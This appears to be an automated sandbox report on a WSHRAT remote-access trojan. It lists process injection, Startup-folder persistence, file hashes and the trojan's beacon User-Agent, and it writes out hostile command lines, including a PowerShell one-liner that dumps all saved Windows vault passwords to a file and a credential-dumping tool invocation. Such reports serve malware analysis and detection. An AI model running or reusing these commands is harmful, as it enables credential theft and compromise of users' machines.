PID 4212 set thread context of 2716 N/A C:\Users\Admin\AppData\Roaming\bin.exe C:\Windows\Explorer.EXE
PID 3384 set thread context of 2716 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|5EF6DE8D|GBSDSUCH|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Windows\SysWOW64\msdt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msdt.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan00516.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Scan00516.js"

C:\Users\Admin\AppData\Roaming\bin.exe

"C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\SysWOW64\autoconv.exe

"C:\Windows\SysWOW64\autoconv.exe"

C:\Windows\SysWOW64\msdt.exe

"C:\Windows\SysWOW64\msdt.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe

"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"

Network


Files

C:\Users\Admin\AppData\Roaming\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

memory/4212-148-0x0000000000F00000-0x000000000124A000-memory.dmp

memory/4212-149-0x0000000000D20000-0x0000000000D4F000-memory.dmp

memory/4212-150-0x0000000000C80000-0x0000000000C95000-memory.dmp

memory/2716-151-0x00000000081C0000-0x00000000082D4000-memory.dmp

memory/3384-153-0x0000000000D30000-0x0000000000D87000-memory.dmp

memory/3384-154-0x0000000000D30000-0x0000000000D87000-memory.dmp

memory/3384-155-0x0000000000110000-0x000000000013F000-memory.dmp

memory/3384-156-0x00000000026A0000-0x00000000029EA000-memory.dmp

memory/3384-158-0x0000000000110000-0x000000000013F000-memory.dmp

memory/2716-159-0x00000000081C0000-0x00000000082D4000-memory.dmp

memory/3384-161-0x0000000002240000-0x00000000022D4000-memory.dmp

memory/2716-162-0x00000000082E0000-0x00000000083D1000-memory.dmp

memory/2716-163-0x00000000082E0000-0x00000000083D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\wshsdk.zip

MD5 d9a63dfd8b73629421bb44bcde09f312
SHA1 7855575c12eaee0e734f3901ca1da2931e9b587a
SHA256 9d5bb028794410fda9d1b3e0f8deb6beee5bd4e1e55340bd375a209c81dc98eb
SHA512 df195c22f7818569cc92e995846ab507caa30f341ac902cc8afe6f06ae4493709e7f80357c91cf14b21e58e2154e0b35f2154d8a313bf36fcff0b72b3a539cf8

memory/2716-3031-0x00000000082E0000-0x00000000083D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\test\is64bit.py

MD5 ca2cc8e73bbca371935bbc92ed18d567
SHA1 1adb458919e842cd78c72b1ff00e5e93cb6ef75e
SHA256 bea3f797921992fda45c19db41e10e3b325bcdd3ea35d35c1fa70535477ad9c1
SHA512 b63df3bad9272f45ba0f50e2c50aaed7a04eb1b000d5855d9f3a8e5c5f2d381c667b1e9c1e1f03f80584a7941a96992838664ae9dd25e1b8320e026da35b8223

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ikuhinox.aks.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5800-21274-0x000001E2F2E70000-0x000001E2F2E92000-memory.dmp

memory/5800-21275-0x00007FFBEBDD0000-0x00007FFBEC891000-memory.dmp

memory/5800-21276-0x000001E2F3030000-0x000001E2F3040000-memory.dmp

memory/5800-21277-0x000001E2F3030000-0x000001E2F3040000-memory.dmp

memory/5800-21278-0x000001E2F2950000-0x000001E2F295A000-memory.dmp

memory/5800-21279-0x000001E2F2E60000-0x000001E2F2E68000-memory.dmp

memory/5800-21283-0x00007FFBEBDD0000-0x00007FFBEC891000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c416c12d1b2b1da8c8655e393b544362
SHA1 fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA256 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
SHA512 cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

MD5 e03cbf90f6ed0c8075e5092621555990
SHA1 18ced6a9659a87b7d1458cdb6ce8409219299fc1
SHA256 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9
SHA512 f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d

C:\Users\Admin\AppData\Roaming\wshsdk\python37.dll

MD5 7f0b34248c228bebc731ef155b50bbff
SHA1 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44
SHA256 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578
SHA512 fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

C:\Users\Admin\AppData\Roaming\wshsdk\VCRUNTIME140.dll

MD5 ae96651cfbd18991d186a029cbecb30c
SHA1 18df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA256 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA512 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

C:\Users\Admin\AppData\Roaming\wshsdk\python37.dll

MD5 7f0b34248c228bebc731ef155b50bbff
SHA1 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44
SHA256 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578
SHA512 fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

C:\Users\Admin\AppData\Roaming\wshsdk\vcruntime140.dll

MD5 ae96651cfbd18991d186a029cbecb30c
SHA1 18df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA256 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA512 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc

MD5 e3f691d123a890f18538f5fead7bd6cd
SHA1 f6e77a0008cefa3a7e3f67c7d11c7787391db5d9
SHA256 3473f433a4d2c09e637f6da9b21172d31468a453c2b47fff27f776e820f25934
SHA512 776e40399adb6e7211ed67022c2b1b12309e5436760c7a0104fe243610e87559f9890575b972cc569d8d793c2d94c70e2f051f36d803ca7c8c89f77f0b39cc23

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__init__.py

MD5 82afd9dcb28c19afdc42097fcbdbe662
SHA1 329e052afe981c8ba32ff78df2deb9d041c05f8b
SHA256 921635dcb46ba5192db20e6c7ed0429c647f7d55ead2f6feaadc00b8410a646e
SHA512 4ae0a9de57f0df6119b99be7168e35917da63e24487b67a4afe96d3996cc42ad22716ac411791998642498bd5f64ab14d9571f4ebf2ee5abc6eb2761270cc897

C:\Users\Admin\AppData\Roaming\wshsdk\lib\codecs.py

MD5 d1d8d96ee5398cda53cbddca69b8e2ab
SHA1 3998c0a2124ab260a7d83f296228be90418b8366
SHA256 39f79489cb6ef0f95dc0ae007c5ece25897f76fa9b56449922f764896cec5ed3
SHA512 0d324416498fba44b41d175194527d5035176642e535bb446ac2c64feed175df7c316507bda375baa77907465973d1340999c859b5d20b51cc2bd96a30857b7b

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\codecs.cpython-37.pyc

MD5 31a2fe679cad1b609caba7c961f43d70
SHA1 21d411d11ce126c054ea70f90196c81b18eaa550
SHA256 6b903c49e04070578aa47a378ff830bc9407be92c8b952a134cec40e944fa30d
SHA512 34dde13a6a197caf1ed9fe73ca30e70c966027c44509e398334a6e9be8eb8f5c3289ef66383f3d9cc69da26cca2097c48cb5fde7be14476fe35fd2cc087da855

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc

MD5 840a56d291513211bd0e65864b9169f3
SHA1 af58891c07f864d4753baa1dfdbdd71a614cded1
SHA256 a597b04b97a8bfe577010d816ca8a1480247ea96b025c59c345b7b120bb5f922
SHA512 b1fbfbc5ca147fd0fcb9e7a509d5ec5a4578bb038a8116c908aa48ecd593694ab4d318b2bc6c8240bc6c2b4e2e23b7b6ed9d295619a862748ad3609445cd3d87

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\aliases.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\io.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\io.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\latin_1.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\utf_8.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\abc.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\abc.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\ascii.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\ascii.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\site.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\site.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\os.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\stat.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\stat.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\os.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\ntpath.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\ntpath.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\genericpath.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\genericpath.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\_collections_abc.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\_collections_abc.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__pycache__\__init__.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__init__.py

C:\Users\Admin\AppData\Roaming\rundll

C:\Users\Admin\AppData\Roaming\wshsdk\lib\site-packages\pywin32.pth

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\_sitebuiltins.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\_sitebuiltins.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\datetime.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\sqlite3\dbapi2.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\datetime.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__init__.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__pycache__\__init__.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\operator.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\operator.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\keyword.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\keyword.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\heapq.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\heapq.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\reprlib.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\lib\reprlib.py

C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\__pycache__\abc.cpython-37.pyc

C:\Users\Admin\AppData\Roaming\wshsdk\DLLs\_sqlite3.pyd

C:\Users\Admin\AppData\Roaming\wshsdk\lib\collections\abc.py

C:\Users\Admin\AppData\Roaming\wshsdk\python3.dll

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe.zip

C:\Users\Admin\AppData\Roaming\cmdc.exe
